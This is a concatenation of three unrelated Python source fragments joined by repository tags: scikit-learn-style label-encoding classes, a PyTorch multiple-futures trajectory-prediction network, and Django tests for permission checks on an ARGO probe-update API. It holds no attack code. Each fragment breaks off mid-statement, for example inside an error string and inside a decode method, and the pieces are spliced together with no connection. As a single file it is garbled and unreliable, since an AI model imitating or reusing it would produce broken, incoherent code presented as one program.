"""Transform X using one-hot encoding.
Parameters
----------
X : array-like, shape=(n_samples, feature_indices_[-1])
Input array of type int.
Returns
-------
X_out : sparse matrix, dtype=int
Transformed input.
"""
X = check_arrays(X, sparse_format='dense', dtype=np.int)[0]
if np.any(X < 0):
raise ValueError("X needs to contain only non-negative integers.")
n_samples, n_features = X.shape
indices = self.feature_indices_
if n_features != indices.shape[0] - 1:
raise ValueError("X has different shape than during fitting."
" Expected %d, got %d."
% (indices.shape[0] - 1, n_features))
n_values_check = np.max(X, axis=0) + 1
if (n_values_check > self.n_values_).any():
raise ValueError("Feature out of bounds. Try setting n_values.")
column_indices = (X + indices[:-1]).ravel()
row_indices = np.repeat(np.arange(n_samples, dtype=np.int32),
n_features)
data = np.ones(n_samples * n_features)
out = sp.coo_matrix((data, (row_indices, column_indices)),
shape=(n_samples, indices[-1]), dtype=self.dtype).tocsr()
if self.n_values == 'auto':
out = out[:, self.active_features_]
return out
class LabelEncoder(BaseEstimator, TransformerMixin):
"""Encode labels with value between 0 and n_classes-1.
Attributes
----------
`classes_`: array of shape [n_class]
Holds the label for each class.
Examples
--------
`LabelEncoder` can be used to normalize labels.
>>> from sklearn import preprocessing
>>> le = preprocessing.LabelEncoder()
>>> le.fit([1, 2, 2, 6])
LabelEncoder()
>>> le.classes_
array([1, 2, 6])
>>> le.transform([1, 1, 2, 6]) #doctest: +ELLIPSIS
array([0, 0, 1, 2]...)
>>> le.inverse_transform([0, 0, 1, 2])
array([1, 1, 2, 6])
It can also be used to transform non-numerical labels (as long as they are
hashable and comparable) to numerical labels.
>>> le = preprocessing.LabelEncoder()
>>> le.fit(["paris", "paris", "tokyo", "amsterdam"])
LabelEncoder()
>>> list(le.classes_)
['amsterdam', 'paris', 'tokyo']
>>> le.transform(["tokyo", "tokyo", "paris"]) #doctest: +ELLIPSIS
array([2, 2, 1]...)
>>> list(le.inverse_transform([2, 2, 1]))
['tokyo', 'tokyo', 'paris']
"""
def _check_fitted(self):
if not hasattr(self, "classes_"):
raise ValueError("LabelNormalizer was not fitted yet.")
def fit(self, y):
"""Fit label encoder
Parameters
----------
y : array-like of shape [n_samples]
Target values.
Returns
-------
self : returns an instance of self.
"""
self.classes_ = np.unique(y)
return self
def fit_transform(self, y):
"""Fit label encoder and return encoded labels
Parameters
----------
y : array-like of shape [n_samples]
Target values.
Returns
-------
y : array-like of shape [n_samples]
"""
self.classes_, y = unique(y, return_inverse=True)
return y
def transform(self, y):
"""Transform labels to normalized encoding.
Parameters
----------
y : array-like of shape [n_samples]
Target values.
Returns
-------
y : array-like of shape [n_samples]
"""
self._check_fitted()
classes = np.unique(y)
if len(np.intersect1d(classes, self.classes_)) < len(classes):
diff = np.setdiff1d(classes, self.classes_)
raise ValueError("y contains new labels: %s" % str(diff))
return np.searchsorted(self.classes_, y)
def inverse_transform(self, y):
"""Transform labels back to original encoding.
Parameters
----------
y : numpy array of shape [n_samples]
Target values.
Returns
-------
y : numpy array of shape [n_samples]
"""
self._check_fitted()
y = np.asarray(y)
return self.classes_[y]
class LabelBinarizer(BaseEstimator, TransformerMixin):
"""Binarize labels in a one-vs-all fashion
Several regression and binary classification algorithms are
available in the scikit. A simple way to extend these algorithms
to the multi-class classification case is to use the so-called
one-vs-all scheme.
At learning time, this simply consists in learning one regressor
or binary classifier per class. In doing so, one needs to convert
multi-class labels to binary labels (belong or does not belong
to the class). LabelBinarizer makes this process easy with the
transform method.
At prediction time, one assigns the class for which the corresponding
model gave the greatest confidence. LabelBinarizer makes this easy
with the inverse_transform method.
Parameters
----------
neg_label: int (default: 0)
Value with which negative labels must be encoded.
pos_label: int (default: 1)
Value with which positive labels must be encoded.
Attributes
----------
`classes_`: array of shape [n_class]
Holds the label for each class.
Examples
--------
>>> from sklearn import preprocessing
>>> lb = preprocessing.LabelBinarizer()
>>> lb.fit([1, 2, 6, 4, 2])
LabelBinarizer(neg_label=0, pos_label=1)
>>> lb.classes_
array([1, 2, 4, 6])
>>> lb.transform([1, 6])
array([[1, 0, 0, 0],
[0, 0, 0, 1]])
>>> lb.fit_transform([(1, 2), (3,)])
array([[1, 1, 0],
[0, 0, 1]])
>>> lb.classes_
array([1, 2, 3])
"""
def __init__(self, neg_label=0, pos_label=1):
if neg_label >= pos_label:
raise ValueError("neg_label must be strictly less than pos_label.")
self.neg_label = neg_label
self.pos_label = pos_label
def _check_fitted(self):
if not hasattr(self, "classes_"):
raise ValueError("LabelBinarizer was not fitted yet.")
def fit(self, y):
"""Fit label binarizer
Parameters
----------
y : numpy array of shape [n_samples] or sequence of sequences
Target values. In the multilabel case the nested sequences can
have variable lengths.
Returns
-------
self : returns an instance of self.
"""
self.multilabel = _is_multilabel(y)
if self.multilabel:
self.indicator_matrix_ = _is_label_indicator_matrix(y)
if self.indicator_matrix_:
self.classes_ = np.arange(y.shape[1])
else:
self.classes_ = np.array(sorted(set.union(*map(set, y))))
else:
self.classes_ = np.unique(y)
return self
def transform(self, y):
"""Transform multi-class labels to binary labels
The output of transform is sometimes referred to by some authors as the
1-of-K coding scheme.
Parameters
----------
y : numpy array of shape [n_samples] or sequence of sequences
Target values. In the multilabel case the nested sequences can
have variable lengths.
Returns
-------
Y : numpy array of shape [n_samples, n_classes]
"""
self._check_fitted()
if self.multilabel or len(self.classes_) > 2:
if _is_label_indicator_matrix(y):
# nothing to do as y is already a label indicator matrix
return y
Y = np.zeros((len(y), len(self.classes_)), dtype=np.int)
else:
Y = np.zeros((len(y), 1), dtype=np.int)
Y += self.neg_label
y_is_multilabel = _is_multilabel(y)
if y_is_multilabel and not self.multilabel:
raise ValueError("The object was not " +
"fitted with multilabel input!")
elif self.multilabel:
if not _is_multilabel(y):
raise ValueError("y should be a list of label lists/tuples,"
"got | |
<reponame>LaudateCorpus1/ml-multiple-futures-prediction<filename>multiple_futures_prediction/model_ngsim.py
#
# For licensing see accompanying LICENSE file.
# Copyright (C) 2019-2020 Apple Inc. All Rights Reserved.
#
from typing import List, Set, Dict, Tuple, Optional, Union, Any
import torch
import torch.nn as nn
from multiple_futures_prediction.my_utils import *
# Multiple Futures Prediction Network
class mfpNet(nn.Module):
def __init__(self, args: Dict) -> None:
super(mfpNet, self).__init__() #type: ignore
self.use_cuda = args['use_cuda']
self.encoder_size = args['encoder_size']
self.decoder_size = args['decoder_size']
self.out_length = args['fut_len_orig_hz']//args['subsampling']
self.dyn_embedding_size = args['dyn_embedding_size']
self.input_embedding_size = args['input_embedding_size']
self.nbr_atten_embedding_size = args['nbr_atten_embedding_size']
self.st_enc_hist_size = self.nbr_atten_embedding_size
self.st_enc_pos_size = args['dec_nbr_enc_size']
self.use_gru = args['use_gru']
self.bi_direc = args['bi_direc']
self.use_context = args['use_context']
self.modes = args['modes']
self.use_forcing = args['use_forcing'] # 1: Teacher forcing. 2:classmates forcing.
self.hidden_fac = 2 if args['use_gru'] else 1
self.bi_direc_fac = 2 if args['bi_direc'] else 1
self.dec_fac = 2 if args['bi_direc'] else 1
self.init_rbf_state_enc( in_dim=self.encoder_size*self.hidden_fac )
self.posi_enc_dim = self.st_enc_pos_size
self.posi_enc_ego_dim = 2
# Input embedding layer
self.ip_emb = torch.nn.Linear(2,self.input_embedding_size) #type: ignore
# Encoding RNN.
if not self.use_gru:
self.enc_lstm = torch.nn.LSTM(self.input_embedding_size,self.encoder_size,1) # type: ignore
else:
self.num_layers=2
self.enc_lstm = torch.nn.GRU(self.input_embedding_size,self.encoder_size, # type: ignore
num_layers=self.num_layers, bidirectional=False)
# Dynamics embeddings.
self.dyn_emb = torch.nn.Linear(self.encoder_size*self.hidden_fac, self.dyn_embedding_size) #type: ignore
context_feat_size = 64 if self.use_context else 0
self.dec_lstm = []
self.op = []
for k in range(self.modes):
if not self.use_gru:
self.dec_lstm.append( torch.nn.LSTM(self.nbr_atten_embedding_size + self.dyn_embedding_size + #type: ignore
context_feat_size+self.posi_enc_dim+self.posi_enc_ego_dim, self.decoder_size) )
else:
self.num_layers=2
self.dec_lstm.append( torch.nn.GRU(self.nbr_atten_embedding_size + self.dyn_embedding_size + context_feat_size+self.posi_enc_dim+self.posi_enc_ego_dim, # type: ignore
self.decoder_size, num_layers=self.num_layers, bidirectional=self.bi_direc ))
self.op.append( torch.nn.Linear(self.decoder_size*self.dec_fac, 5) ) #type: ignore
self.op[k] = self.op[k]
self.dec_lstm[k] = self.dec_lstm[k]
self.dec_lstm = torch.nn.ModuleList(self.dec_lstm) # type: ignore
self.op = torch.nn.ModuleList(self.op ) # type: ignore
self.op_modes = torch.nn.Linear(self.nbr_atten_embedding_size + self.dyn_embedding_size + context_feat_size, self.modes) #type: ignore
# Nonlinear activations.
self.leaky_relu = torch.nn.LeakyReLU(0.1) #type: ignore
self.relu = torch.nn.ReLU() #type: ignore
self.softmax = torch.nn.Softmax(dim=1) #type: ignore
if self.use_context:
self.context_conv = torch.nn.Conv2d(3, 16, kernel_size=3, stride=2) #type: ignore
self.context_conv2 = torch.nn.Conv2d(16, 16, kernel_size=3, stride=2) #type: ignore
self.context_maxpool = torch.nn.MaxPool2d(kernel_size=(4,2)) #type: ignore
self.context_conv3 = torch.nn.Conv2d(16, 16, kernel_size=3, stride=2) #type: ignore
self.context_fc = torch.nn.Linear(16*20*3, context_feat_size) #type: ignore
def init_rbf_state_enc(self, in_dim: int ) -> None:
"""Initialize the dynamic attentional RBF encoder.
Args:
in_dim is the input dim of the observation.
"""
self.sec_in_dim = in_dim
self.extra_pos_dim = 2
self.sec_in_pos_dim = 2
self.sec_key_dim = 8
self.sec_key_hidden_dim = 32
self.sec_hidden_dim = 32
self.scale = 1.0
self.slot_key_scale = 1.0
self.num_slots = 8
self.slot_keys = []
# Network for computing the 'key'
self.sec_key_net = torch.nn.Sequential( #type: ignore
torch.nn.Linear(self.sec_in_dim+self.extra_pos_dim, self.sec_key_hidden_dim),
torch.nn.ReLU(),
torch.nn.Linear(self.sec_key_hidden_dim, self.sec_key_dim)
)
for ss in range(self.num_slots):
self.slot_keys.append( torch.nn.Parameter( self.slot_key_scale*torch.randn( self.sec_key_dim, 1, dtype=torch.float32) ) ) #type: ignore
self.slot_keys = torch.nn.ParameterList( self.slot_keys ) # type: ignore
# Network for encoding a scene-level contextual feature.
self.sec_hist_net = torch.nn.Sequential( #type: ignore
torch.nn.Linear(self.sec_in_dim*self.num_slots, self.sec_hidden_dim),
torch.nn.ReLU(),
torch.nn.Linear(self.sec_hidden_dim, self.sec_hidden_dim),
torch.nn.ReLU(),
torch.nn.Linear(self.sec_hidden_dim, self.st_enc_hist_size)
)
# Encoder position of other's into a feature network, input should be normalized to ref_pos.
self.sec_pos_net = torch.nn.Sequential( #type: ignore
torch.nn.Linear(self.sec_in_pos_dim*self.num_slots, self.sec_hidden_dim),
torch.nn.ReLU(),
torch.nn.Linear(self.sec_hidden_dim, self.sec_hidden_dim),
torch.nn.ReLU(),
torch.nn.Linear(self.sec_hidden_dim, self.st_enc_pos_size)
)
def rbf_state_enc_get_attens(self, nbrs_enc: torch.Tensor, ref_pos: torch.Tensor, nbrs_info_this: List ) -> List[torch.Tensor]:
"""Computing the attention over other agents.
Args:
nbrs_info_this is a list of list of (nbr_batch_ind, nbr_id, nbr_ctx_ind)
Returns:
attention weights over the neighbors.
"""
assert len(nbrs_info_this) == ref_pos.shape[0]
if self.extra_pos_dim > 0:
pos_enc = torch.zeros(nbrs_enc.shape[0],2, device=nbrs_enc.device)
counter = 0
for n in range(len(nbrs_info_this)):
for nbr in nbrs_info_this[n]:
pos_enc[counter,:] = ref_pos[nbr[0],:] - ref_pos[n,:]
counter += 1
Key = self.sec_key_net( torch.cat( (nbrs_enc,pos_enc),dim=1) )
# e.g. num_agents by self.sec_key_dim
else:
Key = self.sec_key_net( nbrs_enc ) # e.g. num_agents by self.sec_key_dim
attens0 = []
for slot in self.slot_keys:
attens0.append( torch.exp( -self.scale*(Key-torch.t(slot)).norm(dim=1)) )
Atten = torch.stack(attens0, dim=0) # e.g. num_keys x num_agents
attens = []
counter = 0
for n in range(len(nbrs_info_this)):
list_of_nbrs = nbrs_info_this[n]
counter2 = counter+len(list_of_nbrs)
attens.append( Atten[:, counter:counter2 ] )
counter = counter2
return attens
def rbf_state_enc_hist_fwd(self, attens: List, nbrs_enc: torch.Tensor, nbrs_info_this: List) -> torch.Tensor:
"""Computes dynamic state encoding.
Computes dynica state encoding with precomputed attention tensor and the
RNN based encoding.
Args:
attens is a list of [ [slots x num_neighbors]]
nbrs_enc is num_agents by input_dim
Returns:
feature vector
"""
out = []
counter = 0
for n in range(len(nbrs_info_this)):
list_of_nbrs = nbrs_info_this[n]
if len(list_of_nbrs) > 0:
counter2 = counter+len(list_of_nbrs)
nbr_feat = nbrs_enc[counter:counter2,:]
out.append( torch.mm( attens[n], nbr_feat ) )
counter = counter2
else:
out.append( torch.zeros(self.num_slots, nbrs_enc.shape[1] ).to(nbrs_enc.device) )
# if no neighbors found, use all zeros.
st_enc = torch.stack(out, dim=0).view(len(out),-1) # num_agents by slots*enc dim
return self.sec_hist_net(st_enc)
def rbf_state_enc_pos_fwd(self, attens: List, ref_pos: torch.Tensor, fut_t: torch.Tensor, flatten_inds: torch.Tensor, chunks: List) -> torch.Tensor:
"""Computes the features from dynamic attention for interactive rollouts.
Args:
attens is a list of [ [slots x num_neighbors]]
ref_pos should be (num_agents by 2)
Returns:
feature vector
"""
fut = fut_t + ref_pos #convert to 'global' frame
nbr_feat = torch.index_select( fut, 0, flatten_inds)
splits = torch.split(nbr_feat, chunks, dim=0) #type: ignore
out = []
for n, nbr_feat in enumerate(splits):
out.append( torch.mm( attens[n], nbr_feat - ref_pos[n,:] ) )
pos_enc = torch.stack(out, dim=0).view(len(attens),-1) # num_agents by slots*enc dim
return self.sec_pos_net(pos_enc)
def forward_mfp(self, hist:torch.Tensor, nbrs:torch.Tensor, masks:torch.Tensor, context:Any,
nbrs_info:List, fut:torch.Tensor, bStepByStep:bool,
use_forcing:Optional[Union[None,int]]=None) -> Tuple[List[torch.Tensor], Any]:
"""Forward propagation function for the MFP
Computes dynamic state encoding with precomputed attention tensor and the
RNN based encoding.
Args:
hist: Trajectory history.
nbrs: Neighbors.
masks: Neighbors mask.
context: contextual information in image form (if used).
nbrs_info: information as to which other agents are neighbors.
fut: Future Trajectory.
bStepByStep: During rollout, interactive or independent.
use_forcing: Teacher-forcing or classmate forcing.
Returns:
fut_pred: a list of predictions, one for each mode.
modes_pred: prediction over latent modes.
"""
use_forcing = self.use_forcing if use_forcing==None else use_forcing
# Normalize to reference position.
ref_pos = hist[-1,:,:]
hist = hist - ref_pos.view(1,-1,2)
# Encode history trajectories.
if isinstance(self.enc_lstm, torch.nn.modules.rnn.GRU):
_, hist_enc = self.enc_lstm(self.leaky_relu(self.ip_emb(hist)))
else:
_,(hist_enc,_) = self.enc_lstm(self.leaky_relu(self.ip_emb(hist))) #hist torch.Size([16, 128, 2])
if self.use_gru:
hist_enc = hist_enc.permute(1,0,2).contiguous()
hist_enc = self.leaky_relu(self.dyn_emb( hist_enc.view(hist_enc.shape[0], -1) ))
else:
hist_enc = self.leaky_relu(self.dyn_emb(hist_enc.view(hist_enc.shape[1],hist_enc.shape[2]))) #torch.Size([128, 32])
num_nbrs = sum([len(nbs) for nb_id, nbs in nbrs_info[0].items() ])
if num_nbrs > 0:
nbrs_ref_pos = nbrs[-1,:,:]
nbrs = nbrs - nbrs_ref_pos.view(1,-1,2) # normalize
# Forward pass for all neighbors.
if isinstance(self.enc_lstm, torch.nn.modules.rnn.GRU):
_, nbrs_enc = self.enc_lstm(self.leaky_relu(self.ip_emb(nbrs)))
else:
_, (nbrs_enc,_) = self.enc_lstm(self.leaky_relu(self.ip_emb(nbrs)))
if self.use_gru:
nbrs_enc = nbrs_enc.permute(1,0,2).contiguous()
nbrs_enc = nbrs_enc.view(nbrs_enc.shape[0], -1)
else:
nbrs_enc = nbrs_enc.view(nbrs_enc.shape[1], nbrs_enc.shape[2])
attens = self.rbf_state_enc_get_attens(nbrs_enc, ref_pos, nbrs_info[0])
nbr_atten_enc = self.rbf_state_enc_hist_fwd(attens, nbrs_enc, nbrs_info[0])
else: # if have no neighbors
attens = None # type: ignore
nbr_atten_enc = torch.zeros( 1, self.nbr_atten_embedding_size, dtype=torch.float32, device=masks.device )
if self.use_context: #context encoding
context_enc = self.relu(self.context_conv( context ))
context_enc = self.context_maxpool( self.context_conv2( context_enc ))
context_enc = self.relu(self.context_conv3(context_enc))
context_enc = self.context_fc( context_enc.view( context_enc.shape[0], -1) )
enc = torch.cat((nbr_atten_enc, hist_enc, context_enc),1)
else:
enc = torch.cat((nbr_atten_enc, hist_enc),1)
# e.g. nbr_atten_enc: [num_agents by 80], hist_enc: [num_agents by 32], enc would be [num_agents by 112]
######################################################################################################
modes_pred = None if self.modes==1 else self.softmax(self.op_modes(enc))
fut_pred = self.decode(enc, attens, nbrs_info[0], ref_pos, fut, bStepByStep, use_forcing)
return fut_pred, modes_pred
def decode(self, enc: torch.Tensor, attens:List, nbrs_info_this:List, ref_pos:torch.Tensor, fut:torch.Tensor, bStepByStep:bool, use_forcing:Any ) -> List[torch.Tensor]:
"""Decode the future trajectory using RNNs.
Given computed feature vector, decode the future with multimodes, using
dynamic attention and either interactive or non-interactive rollouts.
Args:
enc: encoded features, one per agent.
attens: attentional weights, list of objs, each with dimenstion of [8 x 4] (e.g.)
nbrs_info_this: information on who are the neighbors
ref_pos: the current postion (reference position) of the agents.
fut: future trajectory (only useful for teacher or classmate forcing)
bStepByStep: interactive or non-interactive rollout
use_forcing: 0: None. 1: Teacher-forcing. 2: classmate forcing.
Returns:
fut_pred: a list of predictions, one for each mode.
modes_pred: prediction over latent modes.
"""
if not bStepByStep: # Non-interactive rollouts
enc = enc.repeat(self.out_length, 1, 1)
pos_enc = torch.zeros( self.out_length, enc.shape[1], self.posi_enc_dim+self.posi_enc_ego_dim, device=enc.device )
enc2 = torch.cat( (enc, pos_enc), dim=2)
fut_preds = []
for k in range(self.modes):
h_dec, _ = self.dec_lstm[k](enc2)
h_dec | |
content, content_type=content_type)
request.tenant = self.super_tenant
force_authenticate(request, user=self.superuser)
response = self.view(request)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(
response.data['detail'], 'Package version should be specified.'
)
self.assertEqual(admin_models.Probe.objects.all().count(), 3)
probe = admin_models.Probe.objects.get(id=self.probe1.id)
version = admin_models.ProbeHistory.objects.get(
name=probe.name, package=probe.package
)
self.assertEqual(
admin_models.ProbeHistory.objects.filter(object_id=probe).count(), 2
)
self.assertEqual(probe.name, 'ams-probe')
self.assertEqual(probe.package, self.package2)
self.assertEqual(
probe.description,
'Probe is inspecting AMS service by trying to publish and consume '
'randomly generated messages.'
)
self.assertEqual(probe.comment, 'Newer version.')
self.assertEqual(
probe.repository, 'https://github.com/ARGOeu/nagios-plugins-argo'
)
self.assertEqual(
probe.docurl,
'https://github.com/ARGOeu/nagios-plugins-argo/blob/master/'
'README.md'
)
self.assertEqual(version.name, probe.name)
self.assertEqual(version.package, probe.package)
self.assertEqual(version.description, probe.description)
self.assertEqual(version.comment, probe.comment)
self.assertEqual(version.repository, probe.repository)
self.assertEqual(version.docurl, probe.docurl)
self.assertEqual(
version.version_comment,
'[{"changed": {"fields": ["package", "comment"]}}]'
)
self.assertEqual(version.version_user, 'poem')
def test_put_probe_with_no_package_version_sp_user(self):
self.assertEqual(admin_models.Probe.objects.all().count(), 3)
data = {
'id': self.probe1.id,
'name': 'argo-web-api',
'package': 'nonexisting',
'comment': 'New version.',
'docurl':
'https://github.com/ARGOeu/nagios-plugins-argo/blob/'
'master/README.md',
'description': 'Probe is inspecting AMS service by trying '
'to publish and consume randomly generated '
'messages.',
'repository': 'https://github.com/ARGOeu/nagios-plugins-'
'argo',
'update_metrics': False
}
content, content_type = encode_data(data)
request = self.factory.put(self.url, content, content_type=content_type)
request.tenant = self.super_tenant
force_authenticate(request, user=self.user)
response = self.view(request)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(
response.data['detail'],
'You do not have permission to change probes.'
)
self.assertEqual(admin_models.Probe.objects.all().count(), 3)
probe = admin_models.Probe.objects.get(id=self.probe1.id)
version = admin_models.ProbeHistory.objects.get(
name=probe.name, package=probe.package
)
self.assertEqual(
admin_models.ProbeHistory.objects.filter(object_id=probe).count(), 2
)
self.assertEqual(probe.name, 'ams-probe')
self.assertEqual(probe.package, self.package2)
self.assertEqual(
probe.description,
'Probe is inspecting AMS service by trying to publish and consume '
'randomly generated messages.'
)
self.assertEqual(probe.comment, 'Newer version.')
self.assertEqual(
probe.repository, 'https://github.com/ARGOeu/nagios-plugins-argo'
)
self.assertEqual(
probe.docurl,
'https://github.com/ARGOeu/nagios-plugins-argo/blob/master/'
'README.md'
)
self.assertEqual(version.name, probe.name)
self.assertEqual(version.package, probe.package)
self.assertEqual(version.description, probe.description)
self.assertEqual(version.comment, probe.comment)
self.assertEqual(version.repository, probe.repository)
self.assertEqual(version.docurl, probe.docurl)
self.assertEqual(
version.version_comment,
'[{"changed": {"fields": ["package", "comment"]}}]'
)
self.assertEqual(version.version_user, 'poem')
def test_put_probe_with_no_package_version_tenant_superuser(self):
self.assertEqual(admin_models.Probe.objects.all().count(), 3)
data = {
'id': self.probe1.id,
'name': 'argo-web-api',
'package': 'nonexisting',
'comment': 'New version.',
'docurl':
'https://github.com/ARGOeu/nagios-plugins-argo/blob/'
'master/README.md',
'description': 'Probe is inspecting AMS service by trying '
'to publish and consume randomly generated '
'messages.',
'repository': 'https://github.com/ARGOeu/nagios-plugins-'
'argo',
'update_metrics': False
}
content, content_type = encode_data(data)
request = self.factory.put(self.url, content, content_type=content_type)
request.tenant = self.tenant
force_authenticate(request, user=self.tenant_superuser)
response = self.view(request)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(
response.data['detail'],
'You do not have permission to change probes.'
)
self.assertEqual(admin_models.Probe.objects.all().count(), 3)
probe = admin_models.Probe.objects.get(id=self.probe1.id)
version = admin_models.ProbeHistory.objects.get(
name=probe.name, package=probe.package
)
self.assertEqual(
admin_models.ProbeHistory.objects.filter(object_id=probe).count(), 2
)
self.assertEqual(probe.name, 'ams-probe')
self.assertEqual(probe.package, self.package2)
self.assertEqual(
probe.description,
'Probe is inspecting AMS service by trying to publish and consume '
'randomly generated messages.'
)
self.assertEqual(probe.comment, 'Newer version.')
self.assertEqual(
probe.repository, 'https://github.com/ARGOeu/nagios-plugins-argo'
)
self.assertEqual(
probe.docurl,
'https://github.com/ARGOeu/nagios-plugins-argo/blob/master/'
'README.md'
)
self.assertEqual(version.name, probe.name)
self.assertEqual(version.package, probe.package)
self.assertEqual(version.description, probe.description)
self.assertEqual(version.comment, probe.comment)
self.assertEqual(version.repository, probe.repository)
self.assertEqual(version.docurl, probe.docurl)
self.assertEqual(
version.version_comment,
'[{"changed": {"fields": ["package", "comment"]}}]'
)
self.assertEqual(version.version_user, 'poem')
def test_put_probe_with_no_package_version_tenant_user(self):
self.assertEqual(admin_models.Probe.objects.all().count(), 3)
data = {
'id': self.probe1.id,
'name': 'argo-web-api',
'package': 'nonexisting',
'comment': 'New version.',
'docurl':
'https://github.com/ARGOeu/nagios-plugins-argo/blob/'
'master/README.md',
'description': 'Probe is inspecting AMS service by trying '
'to publish and consume randomly generated '
'messages.',
'repository': 'https://github.com/ARGOeu/nagios-plugins-'
'argo',
'update_metrics': False
}
content, content_type = encode_data(data)
request = self.factory.put(self.url, content, content_type=content_type)
request.tenant = self.tenant
force_authenticate(request, user=self.tenant_user)
response = self.view(request)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(
response.data['detail'],
'You do not have permission to change probes.'
)
self.assertEqual(admin_models.Probe.objects.all().count(), 3)
probe = admin_models.Probe.objects.get(id=self.probe1.id)
version = admin_models.ProbeHistory.objects.get(
name=probe.name, package=probe.package
)
self.assertEqual(
admin_models.ProbeHistory.objects.filter(object_id=probe).count(), 2
)
self.assertEqual(probe.name, 'ams-probe')
self.assertEqual(probe.package, self.package2)
self.assertEqual(
probe.description,
'Probe is inspecting AMS service by trying to publish and consume '
'randomly generated messages.'
)
self.assertEqual(probe.comment, 'Newer version.')
self.assertEqual(
probe.repository, 'https://github.com/ARGOeu/nagios-plugins-argo'
)
self.assertEqual(
probe.docurl,
'https://github.com/ARGOeu/nagios-plugins-argo/blob/master/'
'README.md'
)
self.assertEqual(version.name, probe.name)
self.assertEqual(version.package, probe.package)
self.assertEqual(version.description, probe.description)
self.assertEqual(version.comment, probe.comment)
self.assertEqual(version.repository, probe.repository)
self.assertEqual(version.docurl, probe.docurl)
self.assertEqual(
version.version_comment,
'[{"changed": {"fields": ["package", "comment"]}}]'
)
self.assertEqual(version.version_user, 'poem')
def test_put_probe_without_new_version_sp_superuser(self):
data = {
'id': self.probe1.id,
'name': 'ams-probe-new',
'package': 'nagios-plugins-argo (0.1.11)',
'comment': 'Newer version.',
'docurl':
'https://github.com/ARGOeu/nagios-plugins-argo2/blob/'
'master/README.md',
'description': 'Probe is inspecting AMS service.',
'repository': 'https://github.com/ARGOeu/nagios-plugins-'
'argo2',
'update_metrics': False
}
content, content_type = encode_data(data)
request = self.factory.put(self.url, content, content_type=content_type)
request.tenant = self.super_tenant
force_authenticate(request, user=self.superuser)
response = self.view(request)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
probe = admin_models.Probe.objects.get(id=self.probe1.id)
version = admin_models.ProbeHistory.objects.get(
object_id=probe, package__version=probe.package.version
)
self.assertEqual(
admin_models.ProbeHistory.objects.filter(object_id=probe).count(), 2
)
self.assertEqual(probe.name, 'ams-probe-new')
self.assertEqual(probe.package, self.package2)
self.assertEqual(probe.comment, 'Newer version.')
self.assertEqual(
probe.docurl,
'https://github.com/ARGOeu/nagios-plugins-argo2/blob/master/'
'README.md',
)
self.assertEqual(
probe.description, 'Probe is inspecting AMS service.'
)
self.assertEqual(
probe.repository, 'https://github.com/ARGOeu/nagios-plugins-argo2'
)
self.assertEqual(version.name, probe.name)
self.assertEqual(version.package, probe.package)
self.assertEqual(version.comment, probe.comment)
self.assertEqual(version.docurl, probe.docurl)
self.assertEqual(version.description, probe.description)
self.assertEqual(version.repository, probe.repository)
self.assertEqual(
version.version_comment,
'[{"changed": {"fields": ["comment", "description", "docurl", '
'"name", "package", "repository"]}}]'
)
mt = admin_models.MetricTemplate.objects.get(name='argo.AMS-Check')
self.assertEqual(mt.probekey, version)
metric = poem_models.Metric.objects.get(name='argo.AMS-Check')
self.assertEqual(metric.group.name, 'TEST')
self.assertEqual(metric.parent, '')
self.assertEqual(metric.probeexecutable, '["ams-probe"]')
self.assertEqual(metric.probekey, version)
self.assertEqual(
metric.config,
'["maxCheckAttempts 3", "timeout 60", '
'"path /usr/libexec/argo-monitoring/probes/argo", '
'"interval 5", "retryInterval 3"]'
)
self.assertEqual(metric.attribute, '["argo.ams_TOKEN --token"]')
self.assertEqual(metric.dependancy, '')
self.assertEqual(metric.flags, '["OBSESS 1"]')
self.assertEqual(metric.files, '')
self.assertEqual(metric.parameter, '["--project EGI"]')
self.assertEqual(metric.fileparameter, '')
mt_history = poem_models.TenantHistory.objects.filter(
object_repr='argo.AMS-Check'
).order_by('-date_created')
self.assertEqual(mt_history.count(), 1)
self.assertEqual(
mt_history[0].comment, 'Initial version.'
)
serialized_data = json.loads(mt_history[0].serialized_data)[0]['fields']
self.assertEqual(serialized_data['name'], metric.name)
self.assertEqual(serialized_data['mtype'], ['Active'])
self.assertEqual(
serialized_data['probekey'], ['ams-probe-new', '0.1.11']
)
self.assertEqual(serialized_data['group'], ['TEST'])
self.assertEqual(serialized_data['parent'], metric.parent)
self.assertEqual(
serialized_data['probeexecutable'], metric.probeexecutable
)
self.assertEqual(serialized_data['config'], metric.config)
self.assertEqual(serialized_data['attribute'], metric.attribute)
self.assertEqual(serialized_data['dependancy'], metric.dependancy)
self.assertEqual(serialized_data['flags'], metric.flags)
self.assertEqual(serialized_data['files'], metric.files)
self.assertEqual(serialized_data['parameter'], metric.parameter)
self.assertEqual(serialized_data['fileparameter'], metric.fileparameter)
def test_put_probe_without_new_version_sp_user(self):
data = {
'id': self.probe1.id,
'name': 'ams-probe-new',
'package': 'nagios-plugins-argo (0.1.11)',
'comment': 'Newer version.',
'docurl':
'https://github.com/ARGOeu/nagios-plugins-argo2/blob/'
'master/README.md',
'description': 'Probe is inspecting AMS service.',
'repository': 'https://github.com/ARGOeu/nagios-plugins-'
'argo2',
'update_metrics': False
}
content, content_type = encode_data(data)
request = self.factory.put(self.url, content, content_type=content_type)
request.tenant = self.super_tenant
force_authenticate(request, user=self.user)
response = self.view(request)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(
response.data['detail'],
'You do not have permission to change probes.'
)
probe = admin_models.Probe.objects.get(id=self.probe1.id)
version = admin_models.ProbeHistory.objects.get(
object_id=probe, package=probe.package
)
self.assertEqual(probe.name, 'ams-probe')
self.assertEqual(probe.package, self.package2)
self.assertEqual(probe.comment, 'Newer version.')
self.assertEqual(
probe.docurl,
'https://github.com/ARGOeu/nagios-plugins-argo/blob/master/'
'README.md',
)
self.assertEqual(
probe.description,
'Probe is inspecting AMS service by trying to publish and consume '
'randomly generated messages.'
)
self.assertEqual(
probe.repository, 'https://github.com/ARGOeu/nagios-plugins-argo'
)
self.assertEqual(version.name, probe.name)
self.assertEqual(version.package, probe.package)
self.assertEqual(version.comment, probe.comment)
self.assertEqual(version.docurl, probe.docurl)
self.assertEqual(version.description, probe.description)
self.assertEqual(version.repository, probe.repository)
self.assertEqual(
version.version_comment,
'[{"changed": {"fields": ["package", "comment"]}}]'
)
